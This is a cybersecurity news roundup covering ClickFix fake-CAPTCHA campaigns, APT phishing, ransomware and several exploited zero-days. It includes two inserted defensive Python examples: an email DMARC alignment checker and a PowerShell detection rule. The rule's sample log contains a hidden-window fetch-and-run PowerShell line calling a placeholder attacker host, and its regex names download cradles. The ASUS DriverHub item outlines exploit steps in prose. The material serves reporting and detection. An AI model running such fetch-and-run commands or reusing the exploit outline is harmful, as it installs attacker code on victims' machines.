CyberSecurity news

Lawrence Abrams@BleepingComputer //
iClicker, a widely-used student engagement platform, fell victim to a sophisticated ClickFix attack that compromised its website. The attack utilized a fake CAPTCHA prompt to deceive both students and instructors into unknowingly installing malware on their devices. This incident highlights the growing trend of cybercriminals exploiting user trust through social engineering tactics. iClicker, a subsidiary of Macmillan, serves approximately 5,000 instructors and 7 million students across numerous universities in the United States, making it a prime target for such malicious activities. The company has acknowledged the hijacking and issued a security bulletin advising affected users to take immediate action.

The ClickFix attack hinges on exploiting the familiarity users have with CAPTCHA verification processes. Instead of presenting a typical challenge to distinguish between humans and bots, the fake CAPTCHA prompts users to execute malicious scripts. This involves instructing users to open the Windows Run dialog, paste a provided script, and press Enter. Unbeknownst to the user, this action initiates a PowerShell script that retrieves and installs malware, granting attackers unauthorized access to their computer. The University of Michigan’s IT security team issued an early warning to students after discovering the malicious CAPTCHA.

Sophos X-Ops revealed that the malware being installed through this method is the notorious Lumma Stealer. Lumma Stealer is a Malware-as-a-Service (MaaS) offering typically sold via Telegram channels, allowing cybercriminals to steal sensitive data, including browser passwords, cookies, cryptocurrency wallets, and session tokens. iClicker advised users who interacted with the false CAPTCHA between April 12-16 to run antivirus software and change their passwords immediately. The attack demonstrates the need for heightened cybersecurity awareness and vigilance when interacting with online prompts, even on trusted websites.

@The Hacker News //
A critical vulnerability, CVE-2025-31324, affecting SAP NetWeaver is under active exploitation by China-linked Advanced Persistent Threat (APT) groups. This zero-day flaw, which carries the maximum CVSS score of 10.0, is an unauthenticated file upload vulnerability that lets attackers execute remote code on affected systems. By uploading malicious files, attackers gain unauthorized access, posing a significant threat to organizations that rely on SAP systems; the flaw has already led to breaches of critical systems worldwide.

Multiple Chinese hacking groups, including UNC5221, UNC5174, and CL-STA-0048, are leveraging CVE-2025-31324 to maintain persistent remote access, conduct reconnaissance, and deploy malicious programs. Attackers are exploiting this vulnerability to deploy web shells, maintain persistent access, and execute arbitrary commands on compromised systems. EclecticIQ researchers uncovered an exposed directory on attacker-controlled infrastructure, revealing that 581 SAP NetWeaver instances have already been compromised and backdoored with web shells.

The targets of these attacks include critical infrastructure sectors globally, ranging from natural gas distribution networks and water management utilities to medical device manufacturing plants and government ministries. Organizations are urged to immediately apply the emergency patches released by SAP to mitigate the risk of exploitation. CISA has added CVE-2025-31324 to its Known Exploited Vulnerabilities Catalog, further emphasizing the urgency for organizations to address this critical flaw to protect their systems and data from potential compromise.

@securityonline.info //
North Korean state-sponsored threat group Konni, also known as Opal Sleet or TA406, has been observed actively targeting Ukrainian government entities in cyber espionage campaigns. These operations focus on gathering strategic intelligence related to the ongoing conflict between Russia and Ukraine. The group utilizes phishing campaigns to collect information on the trajectory of the Russian invasion, indicating North Korea's sustained interest in the geopolitical dynamics and its willingness to leverage cyber capabilities for strategic advantage.

TA406's cyber espionage activities involve sophisticated social engineering tactics, often impersonating fictitious think tanks, such as the "Royal Institute of Strategic Studies." These phishing emails are laced with lure content relevant to current Ukrainian political events, particularly those surrounding former military leader Valeriy Zaluzhnyi. The attackers use password-protected RAR files hosted on MEGA, containing .CHM files with embedded PowerShell scripts, or HTML files and LNK shortcuts to initiate the infection.

Once a target is compromised, PowerShell scripts are executed to gather extensive system information, including network configurations, system details, and WMI queries. This collected data is then Base64-encoded and transmitted to external servers, enabling the attackers to gain a comprehensive understanding of the targeted systems. The group employs various persistence mechanisms, such as installing batch files as autorun files and utilizing scheduled tasks to ensure continued access to compromised machines.

References:
  • thehackernews.com: North Korean Konni APT Targets Ukraine with Malware to track Russian Invasion Progress
  • BleepingComputer: North Korea ramps up cyberspying in Ukraine to assess war risk
  • BleepingComputer: The state-backed North Korean threat group Konni (Opal Sleet, TA406) was observed targeting Ukrainian government entities in intelligence collection operations.
  • securityonline.info: In a recently disclosed campaign, TA406, a North Korean state-aligned threat actor, has expanded its cyber-espionage efforts …
  • securityonline.info: TA406 Cyber Campaign: North Korea’s Focus on Ukraine Intelligence

Bill Toulas@BleepingComputer //
A new cyber espionage campaign dubbed "ClickFix" is actively targeting Linux systems, marking a concerning shift in focus for threat actors. This campaign, characterized by its precision and stealth, is not a generic, scattershot attack, but rather a calculated effort by groups like APT36, known for their cyberespionage capabilities. Attackers are exploiting vulnerabilities within Linux environments, highlighting the increasing sophistication and reliance on Linux by critical infrastructure and enterprises worldwide. The rise of ClickFix attacks serves as a wake-up call, demonstrating that attackers are now willing to go deeper and target smarter, making it harder for administrators who may have previously felt secure with standard hardening measures.

The core technique of ClickFix attacks involves social engineering to deceive users into executing malicious commands. Attackers have utilized websites that mimic legitimate entities, such as India’s Ministry of Defence, to lure victims. When users visit these sites, they are profiled based on their operating system and redirected to a tailored attack flow. On Linux, this often involves presenting a CAPTCHA page that, when interacted with, copies a shell command to the user’s clipboard. The user is then instructed to execute this command, which can lead to the installation of malware. The command used in these attacks drops a payload on the target system, which, in its current form, fetches a JPEG image from the attacker’s server.

APT36 is reportedly linked to Pakistan and has been known to use sophisticated social engineering tactics to target Indian entities. Historically, APT36 primarily targeted Windows-based environments, but the ClickFix campaign signals a significant evolution in their strategy. This group focuses heavily on espionage, collecting information from government agencies, academic institutions, and defense sectors. What distinguishes APT36 from other advanced persistent threats is its knack for exploiting tools and techniques that leave systems vulnerable without raising immediate alarms. The cross-platform nature of ClickFix attacks, which now include Linux, highlights their versatility and the need for robust defensive measures.

References:
  • linuxsecurity.com: A new campaign, slyly dubbed "ClickFix," is burrowing into Linux environments. It's not some generic, scattershot attack; this is precise, calculated work by APT36, a group making waves with its knack for cyberespionage.
  • The DefendOps Diaries: The Rising Threat of ClickFix Attacks on Linux Systems
  • BleepingComputer: Hackers now testing ClickFix attacks against Linux targets

Pierluigi Paganini@Security Affairs //
Moldovan law enforcement, in collaboration with Dutch authorities, has apprehended a 45-year-old foreign man suspected of orchestrating a series of ransomware attacks targeting Dutch companies in 2021. The suspect is wanted internationally for a range of cybercrimes, including ransomware attacks, blackmail, and money laundering. This arrest marks a significant step in the fight against cybercrime, particularly concerning the persistent threat posed by DoppelPaymer ransomware. The operation involved a coordinated effort between Moldovan prosecutors, the country's Center for Combating Cybercrimes, and law enforcement from the Netherlands, highlighting the importance of international cooperation in tackling sophisticated cyber threats.

The suspect's alleged involvement includes a ransomware attack on the Netherlands Organization for Scientific Research (NWO), resulting in estimated damages of €4.5 million. During the arrest on May 6, Moldovan police searched the suspect's residence and car, seizing substantial evidence, including over €84,000 in cash, an electronic wallet, two laptops, a mobile phone, a tablet, six bank cards, two data storage devices, and six memory cards. The suspect is currently in custody, and extradition procedures to the Netherlands are underway, where he will face charges related to his alleged cybercrimes.

The DoppelPaymer ransomware group emerged in 2019, known for its sophisticated tactics, including data exfiltration before encryption, to pressure victims into paying ransoms. The group has targeted various sectors globally and evolved into other ransomware variants, showcasing the challenges in combating this type of cyber threat. The arrest in Moldova underscores the ongoing efforts by law enforcement to pursue and bring cybercriminals to justice, reinforcing the message that cybercrime will not go unpunished.

References:
  • DataBreaches.Net: Moldovan Police Arrest Suspect in €4.5M Ransomware Attack on Dutch Research Agency
  • securityaffairs.com: Moldovan Police arrested a 45-year-old foreign man participating in ransomware attacks on Dutch companies
  • The DefendOps Diaries: DoppelPaymer Ransomware: A Persistent Cyber Threat and Recent Arrests
  • BleepingComputer: Moldova arrests suspect linked to DoppelPaymer ransomware attacks
  • www.techradar.com: Suspect arrested with links to €4.5M DoppelPaymer ransomware attacks

@www.helpnetsecurity.com //
CISA has added five actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. This action follows Microsoft's May 2025 Patch Tuesday, which addressed a total of 72 vulnerabilities, including these five zero-day exploits. The vulnerabilities affect various Windows components, posing a significant risk to systems if left unpatched. The addition to the KEV catalog underscores the urgency for organizations to apply the relevant Microsoft patches.

The zero-day vulnerabilities include CVE-2025-30397, CVE-2025-30400, CVE-2025-32701, CVE-2025-32706, and CVE-2025-32709. CVE-2025-30397 is a memory corruption vulnerability in the Windows scripting engine, while CVE-2025-30400 affects the Microsoft DWM Core Library. CVE-2025-32701 and CVE-2025-32706 are defects in the Windows Common Log File System (CLFS) Driver, which are particularly concerning as they can lead to elevation of privilege to SYSTEM. CVE-2025-32709 resides in the Windows Ancillary Function Driver for WinSock.

Security experts recommend immediate patching, especially for the CLFS driver vulnerabilities. Mike Walters of Action1 warned that attackers could exploit the CLFS zero-days to gain full control of systems, allowing them to run arbitrary code, install malware, modify data, or disable security protections. The Cybersecurity and Infrastructure Security Agency (CISA) encourages all organizations to review and apply the necessary updates to mitigate the risk of exploitation.

References:
  • isc.sans.edu: Microsoft Patch Tuesday: May 2025, (Tue, May 13th)
  • cyberscoop.com: Microsoft’s Patch Tuesday closes 72 vulnerabilities, including 5 zero-days
  • Help Net Security: Patch Tuesday: Microsoft fixes 5 actively exploited zero-days
  • cyberinsider.com: Microsoft Patches Five Actively Exploited Flaws in May 2025 Windows 11 Update
  • ComputerWeekly.com: May Patch Tuesday brings five exploited zero-days to fix

Zeljka Zorz@Help Net Security //
Fortinet is addressing a critical zero-day vulnerability, CVE-2025-32756, that has been actively exploited to compromise FortiVoice enterprise phone systems. The vulnerability is a stack-based buffer overflow, allowing unauthenticated remote attackers to execute arbitrary code or commands by sending a specially crafted HTTP request. Fortinet has released security updates to patch this remote code execution vulnerability, urging users to upgrade to fixed releases for affected solutions, which include FortiMail, FortiNDR, FortiRecorder, and FortiCamera, although attackers are primarily targeting FortiVoice installations.

Fortinet's Product Security Team discovered CVE-2025-32756 based on attackers' activity, including network scans, erasing system crashlogs, enabling "fcgi debugging" to log credentials, and dropping malware. The company has shared indicators of compromise (IOCs), such as IP addresses used by attackers, log entries, added or modified files, and modified settings. These IOCs help users detect and respond to potential breaches. Fortinet’s swift response to this exploit involved releasing security patches and providing mitigation strategies to protect their customers.

For FortiVoice installations that cannot be immediately upgraded, Fortinet recommends disabling the system’s HTTP/HTTPS administrative interface as a temporary workaround. A separate advisory, ZDI-25-288, covers a directory traversal remote code execution vulnerability in FortiWeb. Discovered by Kentaro Kawane of GMO Cybersecurity by Ierae, this flaw allows remote attackers to execute arbitrary code on affected FortiWeb installations, although it requires authentication. Fortinet has issued an update to correct this vulnerability, emphasizing the company's commitment to addressing security flaws promptly.

References:
  • BleepingComputer: Fortinet released security updates to patch a critical remote code execution vulnerability exploited as a zero-day in attacks targeting FortiVoice enterprise phone systems.
  • The DefendOps Diaries: Fortinet's Swift Response to Zero-Day Exploits in FortiVoice Systems
  • BleepingComputer: Fortinet fixes critical zero-day exploited in FortiVoice attacks
  • Help Net Security: Zero-day exploited to compromise Fortinet FortiVoice systems (CVE-2025-32756)
  • gbhackers.com: Gbhackers post on fortinet zero-day
  • Arctic Wolf: CVE-2025-32756: Exploitation of Critical Severity Zero-Day Vulnerability in Fortinet FortiVoice
  • malware.news: CVE-2025-32756: Exploitation of Critical Severity Zero-Day Vulnerability in Fortinet FortiVoice
  • arcticwolf.com: Arctic Wolf blog post on CVE-2025-32756

@ComputerWeekly.com //
Marks & Spencer (M&S) has confirmed that customer data was stolen during a recent cyberattack, with the ransomware group DragonForce claiming responsibility. The retail giant has initiated a mandatory password reset for all customers as a precautionary measure following the breach. The attack, which has shaken the UK retail sector, also affected other major retailers including the Co-operative Group (Co-op) and Harrods.

The stolen data includes customer names, dates of birth, home and email addresses, phone numbers, household information, and online order histories. However, M&S assures customers that the compromised information does not include usable card or payment details, or account passwords. The company is working with external experts to secure its systems and has reported the incident to the relevant government authorities and law enforcement agencies. Initial reports linked Scattered Spider to the attack; DragonForce has since claimed responsibility.

DragonForce, a relatively new Ransomware-as-a-Service (RaaS) group, has emerged as a significant threat, initially framing itself as a pro-Palestinian hacktivist collective before shifting to profit-driven operations. They operate by leasing their ransomware to affiliates, who then carry out the attacks, with the developers taking a cut of the ransom payments. DragonForce has been targeting high-profile UK retailers, deploying ransomware to encrypt networks, disrupt online orders and payment systems, and threaten the public release of stolen data.

References:
  • bsky.app: M&S now admits that customer data was stolen as part of the ransomware attack.
  • CyberInsider: Marks & Spencer Confirms Customer Data Theft in April Cyberattack
  • securityaffairs.com: Marks and Spencer confirms data breach after April cyber attack
  • techcrunch.com: Marks & Spencer confirms customers’ personal data was stolen in hack
  • ComputerWeekly.com: M&S forces customer password resets after data breach
  • slcyber.io: DragonForce Claims Responsibility for Series of Attacks on UK Retailers
  • www.itpro.com: The retailer confirmed hackers accessed customer data, but not payment information or passwords
  • cyberinsider.com: Marks & Spencer (M&S) has confirmed that personal customer data was stolen during the cyberattack that disrupted its retail operations last month, escalating a previously opaque incident into a confirmed data breach.
  • The Register - Security: Market cap down by more than £1B since April 22 Marks & Spencer has confirmed that customer data was stolen as part of its cyberattack, fueling conjecture that ransomware was involved.

@community.tenable.com //
Ivanti is urging customers to immediately update their Endpoint Manager Mobile (EPMM) software after the discovery and active exploitation of two critical vulnerabilities, CVE-2025-4427 and CVE-2025-4428. The vulnerabilities reside within open-source libraries integrated into EPMM and can be chained together by attackers to achieve unauthenticated remote code execution on affected devices. This means malicious actors could potentially gain complete control over vulnerable systems without needing any login credentials. Ivanti has released security updates to address these flaws and strongly recommends that users apply these patches as soon as possible, especially for internet-facing devices.

The first vulnerability, CVE-2025-4427, is an authentication bypass flaw present in the API component of Ivanti EPMM. This flaw allows attackers to bypass security measures and gain unauthorized access to protected resources. The second, CVE-2025-4428, is a remote code execution vulnerability that allows attackers to execute arbitrary code on the target system. By chaining these vulnerabilities, a threat actor could potentially bypass authentication and then execute malicious code, leading to a full system compromise. CERT-EU has also flagged these vulnerabilities, indicating potential exploitation within European Union institutions.

Ivanti has released patched versions of EPMM to remediate the vulnerabilities (versions 11.12.0.5, 12.3.0.2, 12.4.0.2, and 12.5.0.1). For those unable to apply the updates immediately, Ivanti recommends filtering access to the API using built-in Portal ACLs or an external Web Application Firewall (WAF) as a temporary mitigation. Furthermore, an RPM file containing a hot-fix mitigation is available through Ivanti Support. These vulnerabilities specifically affect the on-premises version of Ivanti EPMM and do not impact cloud-based services like Ivanti Neurons for MDM or Ivanti Sentry.

@securityonline.info //
The North Korean threat actor WaterPlum, also known as Famous Chollima or PurpleBravo, is behind the latest iteration of the OtterCookie malware, version 4. This cross-platform malware is designed to target financial institutions, cryptocurrency platforms, and FinTech companies across the globe. OtterCookie's evolution demonstrates a significant advancement in its capabilities, posing an increased threat level. The malware is often deployed through the "Contagious Interview" campaign, which uses fake job offers to entice victims into opening malicious payloads.

OtterCookie v4 boasts enhanced credential theft capabilities, with modules specifically designed to steal credentials from Google Chrome, MetaMask, and iCloud Keychain. One module decrypts and extracts passwords from Chrome using the Windows Data Protection API (DPAPI), while another targets the MetaMask extension in browsers like Chrome and Brave, as well as iCloud Keychain, to harvest sensitive data. These stolen credentials are then stored in a local database before being exfiltrated. These advancements represent a significant leap from earlier versions of OtterCookie which primarily functioned as a file grabber.

A key feature of OtterCookie v4 is its ability to detect virtual machine environments, including VMware, VirtualBox, Microsoft Hyper-V, and QEMU. This allows the malware to evade analysis and detection by security researchers and automated sandbox environments. The malware's cross-platform functionality allows it to operate across Windows, macOS, and Linux, significantly broadening its potential impact. Researchers first exposed OtterCookie in December 2024, and the malware has rapidly evolved since then, with version 3 appearing in February 2025 and version 4 in April 2025.

References:
  • MeatMutts: OtterCookie v4 Adds VM Detection and Chrome, MetaMask Credential Theft Capabilities
  • Anonymous: NTT Security’s Masaya Motoda & Rintaro Koike detail the key differences between the OtterCookie malware variants used by WaterPlum (Famous Chollima/PurpleBravo) in November 2024 and in February and April 2025, highlighting their chronological evolution.
  • securityonline.info: WaterPlum’s OtterCookie Malware Upgrades to v4 with Credential Theft and Sandbox Detection Features
  • Anonymous: NTT Security - OtterCookie Malware variants by WaterPlum
  • securityonline.info: Information on new malware OtterCookie

@securebulletin.com //
A new multi-platform malware campaign is targeting organizations in Southern Europe, specifically Spain, Italy, and Portugal, through sophisticated phishing emails. This campaign leverages weaponized PDF invoices to deliver a Java-based Remote Access Trojan (RAT) known as RATty. The attack begins with emails that bypass SPF/DKIM checks by abusing Spain's serviciodecorreo.es email service, allowing forged sender addresses to appear legitimate. The emails contain a PDF attachment mimicking an invoice from Medinova Health Group, enticing recipients to click a Dropbox link.
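The SPF/DKIM point above is worth making concrete for defenders: a message relayed through a legitimate third-party sending service can pass both checks for the relay's own domain while the From: address the recipient sees belongs to someone else. The following Python is an added example, not code from the original article or from any source it cites. It evaluates DMARC-style identifier alignment over two constructed header sets (the domain names, header values and the `relay.example.net` sending service are all placeholders and say nothing about how the real campaign's mail was routed), and it approximates the organizational domain with the last two labels instead of consulting the Public Suffix List.

```python
"""DMARC-style alignment check on already-authenticated headers (added example).

Constructed sample headers; real evaluators find the organizational domain via
the Public Suffix List, which is approximated here by the last two labels.
"""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: relayed through a third-party sending service. SPF and
# DKIM both pass for the relay's domain, but neither authenticates the domain
# shown to the recipient in From:.
SAMPLE_MISALIGNED = """\
Return-Path: <bounce@relay.example.net>
Authentication-Results: mx.example.org;
 spf=pass smtp.mailfrom=relay.example.net;
 dkim=pass header.d=relay.example.net
From: Billing <invoices@vendor.example.com>
To: ap@example.org
Subject: Invoice

Please see the attached invoice.
"""

# Constructed sample: the sender authenticates its own domain, so alignment holds.
SAMPLE_ALIGNED = """\
Return-Path: <bounce@vendor.example.com>
Authentication-Results: mx.example.org;
 spf=pass smtp.mailfrom=vendor.example.com;
 dkim=pass header.d=mail.vendor.example.com
From: Billing <invoices@vendor.example.com>
To: ap@example.org
Subject: Invoice

Please see the attached invoice.
"""


def org_domain(domain: str) -> str:
    """Approximate organizational domain: last two labels.
    Assumption: no multi-label public suffixes (e.g. co.uk) in the input."""
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def aligned(auth_domain: str, from_domain: str, strict: bool = False) -> bool:
    """Relaxed alignment: same organizational domain. Strict: exact match."""
    if strict:
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def evaluate(raw: str) -> dict:
    """Per-mechanism results plus whether either authenticated identifier aligns."""
    msg = message_from_string(raw)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2]
    # Unfold the (possibly multi-line) Authentication-Results header before matching.
    ar = " ".join(msg.get("Authentication-Results", "").split())
    spf = re.search(r"spf=(\w+)\s+smtp\.mailfrom=([\w.-]+)", ar)
    dkim = re.search(r"dkim=(\w+)\s+header\.d=([\w.-]+)", ar)
    spf_ok = bool(spf) and spf.group(1) == "pass" and aligned(spf.group(2), from_domain)
    dkim_ok = bool(dkim) and dkim.group(1) == "pass" and aligned(dkim.group(2), from_domain)
    return {
        "from_domain": from_domain,
        "spf_result": spf.group(1) if spf else "none",
        "dkim_result": dkim.group(1) if dkim else "none",
        "spf_aligned": spf_ok,
        "dkim_aligned": dkim_ok,
        # DMARC passes only when at least one passing mechanism aligns with From:.
        "dmarc_pass": spf_ok or dkim_ok,
    }


if __name__ == "__main__":
    for name, raw in (("misaligned", SAMPLE_MISALIGNED), ("aligned", SAMPLE_ALIGNED)):
        print(name, evaluate(raw))
```

The first sample reports `spf=pass` and `dkim=pass` yet fails overall, which is the case a gateway that stops at SPF/DKIM would let through; the alignment step is what ties the authenticated domain back to the address the user actually reads.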

This link redirects victims to an HTML file (Fattura.html) that initiates a multi-stage verification process, including a fake CAPTCHA, to further deceive the user. The HTML file then utilizes Ngrok tunneling to dynamically switch content based on the victim's geolocation. If the request originates from Italy, the user is redirected to MediaFire to download a malicious Java Archive (JAR) file named FA-43-03-2025.jar. Users outside of Italy are redirected to benign Google Drive documents, effectively bypassing automated sandboxes typically hosted in cloud regions outside Italy.

The final JAR file contains the RATty malware, a cross-platform Remote Access Trojan that exploits Java's capabilities to grant attackers extensive control over the compromised system. This includes remote command execution, keystroke logging, screenshot capture, and data exfiltration. The attackers may also repackage RATty in MSI installers, further disguising the threat as a software update to increase the odds of user execution. Organizations are advised to update endpoint protection tools to defend against this evolving phishing tactic.

@cyberpress.org //
The North Korea-linked threat group APT37 has been identified as the perpetrator of a sophisticated spear phishing campaign targeting activists and organizations focused on North Korean affairs. Genians Security Center researchers analyzed the campaign, dubbed "Operation: ToyBox Story," which involved the use of fake academic forum invites from a South Korean national security think tank to lure victims. The attackers leveraged Dropbox to deliver malicious LNK files, demonstrating an evolution in their attack methodology.

The spear phishing emails were cleverly disguised as invitations and information from a legitimate South Korean national security think tank, referencing real-world events such as "Trump 2.0 Era: Prospects and South Korea’s Response" to enhance credibility. These emails contained Dropbox links leading to compressed ZIP archives, which, upon extraction, harbored malicious shortcut (LNK) files. When a user opens the malicious LNK file, it initiates a multi-stage malware loader chain.

The campaign highlighted APT37's ongoing use of trusted cloud platforms like Dropbox as command and control (C2) infrastructure, a tactic known as "Living off Trusted Sites" (LoTS). This approach allows the attackers to blend malicious traffic with legitimate cloud service activity, complicating detection and response efforts. The malicious LNK files are designed to execute hidden PowerShell commands, which deploy a decoy document while simultaneously creating hidden files and ultimately injecting shellcode directly into memory to install a variant of the RoKRAT malware family. RoKRAT collects system information and allows for further exploitation of the victim's system.
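Both the fake-CAPTCHA ClickFix chain reported earlier on this page (Run dialog, then PowerShell) and the APT37 LNK chain in this item end the same way on the endpoint: explorer.exe spawning PowerShell, directly or via cmd.exe, with a hidden window and a fetch-and-run or encoded command line. The following Python is an added example rather than code from either article. It runs a simple process-creation rule over constructed, Sysmon-style JSON events; the field names ParentImage, Image, CommandLine and ProcessId are assumed, and the command lines and the `attacker.invalid` host are placeholders.

```python
"""Process-creation rule for shell-launched PowerShell (added example).

Constructed, simplified Sysmon EventID 1 style records; field names assumed.
A double-clicked LNK and a command pasted into the Run dialog both arrive as
children of explorer.exe, so the parent/child pair plus a hidden window and a
download cradle is the signal, whichever lure delivered it.
"""
import json
import re

# Script hosts of interest when spawned by the user's shell.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
SHELL_PARENTS = {"explorer.exe"}

# Tokens typical of fetch-and-run one-liners and encoded commands.
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"invoke-expression|\biex\b|-enc(odedcommand)?\b",
    re.IGNORECASE,
)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)

# Constructed log lines (one JSON object per line); paths and hosts are placeholders.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"ProcessId": 3100, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"ProcessId": 3200, "ParentImage": r"C:\Program Files\Editor\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-ChildItem"},
    # ClickFix-style: pasted into the Run dialog, hidden window, fetch and eval.
    {"ProcessId": 4412, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iwr http://attacker.invalid/c | iex"'},
    # LNK-style: cmd.exe wrapper launching hidden, encoded PowerShell.
    {"ProcessId": 4480, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -WindowStyle Hidden -EncodedCommand <base64-placeholder>"},
    # Interactive PowerShell opened from the Start menu: same parent, no signal.
    {"ProcessId": 5000, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
])


def basename(path: str) -> str:
    """Last component of a Windows-style path, lower-cased."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> dict:
    """Verdict for one process-creation event, with the reasons that fired."""
    reasons = []
    if (basename(event["ParentImage"]) in SHELL_PARENTS
            and basename(event["Image"]) in SCRIPT_HOSTS):
        cmdline = event.get("CommandLine", "")
        if HIDDEN_WINDOW.search(cmdline):
            reasons.append("hidden window requested")
        if DOWNLOAD_CRADLE.search(cmdline):
            reasons.append("download/eval cradle or encoded command")
    return {"pid": event["ProcessId"], "suspicious": bool(reasons), "reasons": reasons}


def scan(lines) -> list:
    """Parse JSON-per-line events and analyze each one."""
    return [analyze(json.loads(line)) for line in lines if line.strip()]


def suspicious_pids(lines) -> list:
    """ProcessIds of the events the rule flags, in log order."""
    return [v["pid"] for v in scan(lines) if v["suspicious"]]


if __name__ == "__main__":
    for verdict in scan(SAMPLE_LOG.splitlines()):
        if verdict["suspicious"]:
            print(verdict["pid"], ", ".join(verdict["reasons"]))
```

The rule deliberately keys on the parent/child relationship rather than on the lure: the interactive PowerShell session in the last sample event shares the explorer.exe parent and is left alone, while the two shell-launched, hidden, fetch-or-encoded command lines are flagged. In production the same logic belongs in the EDR or SIEM query over real process-creation telemetry.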

References:
  • cyberpress.org: The North Korea-linked threat group APT37 launched a sophisticated spear phishing campaign targeting activists and organizations focused on North Korean affairs. The attackers disguised their emails as invitations and information from a South Korean national security think tank, referencing real-world events such as “Trump 2.0 Era: Prospects and South Korea’s Response” to enhance credibility.
  • www.genians.co.kr: Genians Security Center (GSC) researchers analyse APT37's “Operation: ToyBox Story”, in which the group used fake academic forum invites from a South Korean security think tank to lure victims and delivered malicious LNK files via the Dropbox cloud platform.

Sead Fadilpašić@techradar.com //
ASUS DriverHub, a driver management utility designed to simplify updates by automatically detecting motherboard models, is facing scrutiny following the discovery of critical security flaws. Cybersecurity researchers identified vulnerabilities, designated as CVE-2025-3462 and CVE-2025-3463, that could allow malicious actors to remotely execute code on systems with the software installed. These flaws stem from insufficient HTTP request validation, potentially enabling unauthorized remote interactions with the software and the ability for malicious sites to execute commands with administrative rights.

Researchers discovered a one-click remote code execution vulnerability in ASUS's pre-installed DriverHub software. The attack vector involves tricking users into visiting a malicious subdomain of driverhub.asus[.]com. By leveraging DriverHub's UpdateApp endpoint, attackers can execute a legitimate version of "AsusSetup.exe" with modified parameters that enable the execution of arbitrary files hosted on the attacker's domain. This exploit requires the creation of a malicious domain hosting three files: the payload, a modified AsusSetup.ini with a "SilentInstallRun" property pointing to the payload, and the legitimate AsusSetup.exe.

ASUS has released an update, version 1.0.6.0 or newer, to address these vulnerabilities and urges users to update immediately. The update includes important security fixes to mitigate the risk of remote code execution. Users are advised to open the ASUS DriverHub utility and click the "Update Now" button to complete the patching process. While there are no confirmed cases of active exploitation in the wild, a proof of concept exploit exists, highlighting the potential danger, especially for sectors relying heavily on ASUS motherboards.

References:
  • securityonline.info: Critical Security Flaws Found in ASUS DriverHub: Update Immediately
  • Rescana: Vulnerabilities in ASUS DriverHub Exposed: CVE-2025-3462 and CVE-2025-3463 Analysis
  • cyberinsider.com: Critical Flaw in ASUS DriverHub Exposes Users to Remote Code Execution
  • securityaffairs.com: Researchers found one-click RCE in ASUS’s pre-installed software DriverHub
  • The DefendOps Diaries: ASUS DriverHub Vulnerability: Understanding and Mitigating CVE-2025-3463
  • The Hacker News: ASUS Patches DriverHub RCE Flaws Exploitable via HTTP and Crafted .ini Files
  • BleepingComputer: The ASUS DriverHub driver management utility was vulnerable to a critical remote code execution flaw that allowed malicious sites to execute commands on devices with the software installed.
  • bsky.app: ASUS DriverHub driver management utility was vulnerable to a critical remote code execution flaw that allowed malicious sites to execute commands on devices with the software installed.
  • www.techradar.com: Details on ASUS DriverHub driver management tool targeted by RCE vulnerability
  • www.scworld.com: ASUS DriverHub vulnerabilities fixed
  • Tech Monitor: TechMonitor article about ASUS DriverHub security vulnerability
  • the420.in: The420.in

@blog.checkpoint.com //
Ransomware attacks have surged in 2025, evolving into more sophisticated and dangerous threats than ever before. What started as simple file encryption schemes has morphed into full-blown extortion ecosystems. These modern attacks now involve data exfiltration, public shaming of victims, and even DDoS attacks, marking a significant escalation in cybercriminal tactics. According to Check Point Research, the first quarter of 2025 saw a record-breaking 2,289 victims published on data leak sites, representing a staggering 126% year-over-year increase, demonstrating the growing threat volume and the evolving tactics employed by attackers.

The rise of Ransomware-as-a-Service (RaaS) has also significantly contributed to the increased threat landscape. Check Point's 2024 Annual Ransomware Report revealed that 46 new ransomware groups emerged in that year alone, a 48% increase compared to the previous year. These groups offer ready-made ransomware kits, lowering the barrier to entry for cybercriminals and enabling a wider range of actors to launch attacks. Experts are particularly concerned about the potential for "triple extortion" models, which combine DDoS attacks, public leak threats, and direct harassment of customers or partners to pressure victims into paying ransoms.

In addition to the increasing sophistication of ransomware itself, cybercriminals are also abusing legitimate tools to blend in with compromised environments. The Cactus ransomware gang, for example, has been known to direct victims to initiate Microsoft Quick Assist remote access sessions, even assisting them with the installation of the program. With Anti-Ransomware Day falling on May 12, organizations are urged to prioritize proactive defenses, incident response planning, and employee awareness training to mitigate the growing risk of ransomware attacks in 2025 and beyond.

Recommended read:
References :

@cyberinsider.com //
References: cyberinsider.com
Recent reports highlight a surge in the exploitation of critical software vulnerabilities across various platforms. These vulnerabilities, affecting both widely used software like Microsoft products and open-source tools such as the Linux kernel, pose significant risks to system security. A particularly concerning flaw has been identified in ASUS DriverHub, potentially allowing remote code execution with administrative privileges. This highlights the persistent challenge of maintaining secure software ecosystems and the importance of vigilant monitoring and rapid patching.

